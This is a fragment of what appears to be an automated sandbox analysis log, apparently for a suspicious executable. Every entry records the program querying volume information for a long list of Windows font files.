                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CENTURY.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PRISTINA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MISTRAL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LHANDW.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\JUICE___.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FREESCPT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRADHITC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BKANT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GARA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GARAIT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GARABD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOTHIC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOTHICI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOTHICB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ALGER.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BASKVILL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BAUHS93.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BELL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BELLI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BELLB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRLNSR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRLNSB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BERNHC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRITANIC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BROADW.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALIFR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALIFI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALIFB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CENTAUR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CHILLER.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\COLONNA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\COOPBL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FTLTLT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\HARNGTON.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\HTOWERT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LBRITE.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LBRITED.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LBRITEI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LCALLIG.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LFAX.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LFAXD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LFAXI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LFAXDI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MATURASC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MOD20.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\NIAGENG.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\OLDENGL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ONYX.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PARCHM.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\POORICH.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\RAVIE.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\INFROMAN.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SHOWG.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SNAP____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\STENCIL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\VINERITC.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\VIVALDII.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LATINWD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCM_____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCMI____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCB_____.TTF  VolumeInformation
